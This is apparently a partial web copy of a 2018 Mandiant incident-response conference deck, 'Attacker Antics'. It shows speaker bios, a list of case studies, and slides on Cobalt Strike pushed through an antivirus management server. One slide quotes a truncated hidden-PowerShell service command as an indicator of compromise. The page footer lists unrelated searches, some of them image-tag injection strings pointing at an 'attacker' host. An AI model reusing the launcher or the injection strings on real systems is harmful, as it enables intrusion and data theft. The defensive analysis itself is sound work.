ATTACKER ANTICS - x33fcon
[Pages:65]ATTACKER ANTICS
ILLUSTRATIONS OF INGENUITY
Tom Hall and Bart Inglot
2
Bart Inglot
Principal Consultant at Mandiant Incident Responder Rock Climber Globetrotter
From Poland but live in Singapore Spent 1 year in Brazil and 8 years in the UK Learning French... poor effort!
Twitter: @bartinglot
?2018 FireEye | Private & Confidential
3
Tom Hall
Senior Consultant at Mandiant Incident Responder Rugby League Player & Coach Rock Climber (Bart's better) From England and based in London
Twitter: @thall_sec
?2018 FireEye | Private & Confidential
4
Disclosure Statement
" Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals " associated with our customers.
?2018 FireEye | Private & Confidential
5
Today's Tales
1. AV Server Gone Bad 2. Stealing Secrets From An Air-Gapped Network 3. A Backdoor That Uses DNS for C2 4. Hidden Comment That Can Haunt You 5. A Little Known Persistence Technique 6. Securing Corporate Email is Tricky 7. Hiding in Plain Sight 8. Rewriting Import Table 9. Dastardly Diabolical Evil (aka DDE)
?2018 FireEye | Private & Confidential
6
AV SERVER GONE BAD
Cobalt Strike, PowerShell & McAfee ePO
(1/9)
7
AV Server Gone Bad ? Background
Attackers used Cobalt Strike (along with other malware) Easily recognisable IOCs when recorded by Windows Event Logs
Random service name ? also seen with Metasploit Base64-encoded script, "%COMSPEC%" and "powershell.exe" Decoding the script yields additional PowerShell script with a base64-encoded GZIP stream that in turn
contained a base64-encoded Cobalt Strike "Beacon" payload.
A service was installed in the system. Service Name: 0f65bea Service File Name: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkAT...
Attackers used Cobalt Strike "Beacon" (mostly) with "named-pipe" to enable easy pivoting Also made use of occasional external C2 with malleable profile ? Amazon Books anyone?
How to easily distribute the payload to systems?
?2018 FireEye | Private & Confidential
8
ePO Server traffic to multiple clients
?2018 FireEye | Private & Confidential
That can't be good!
................
................
In order to avoid copyright disputes, this page is only a partial summary.
To fulfill the demand for quickly locating and searching documents.
It is intelligent file search solution for home and business.
Related download
- command line crash course computer village
- unix vs powershell commands a comparison under
- learning ms dos basics a tutorial
- running custom scripts in the guest operating system with
- scripting with perforce
- installation and configuration guide venafi
- attacker antics x33fcon
- upd and fslogix containers rds gurus
Related searches
- math antics integer operations
- math antics worksheets
- math antics worksheets answers
- math antics multiplying integers
- math antics adding integers
- youtube math antics integers
- math antics probability video
- 1 img src http attacker 9278 log php
- the img src http attacker 9134 log php
- the img src http attacker 9549 log php
- the img src http attacker 9272 log php
- facebook img src http attacker 9286 log php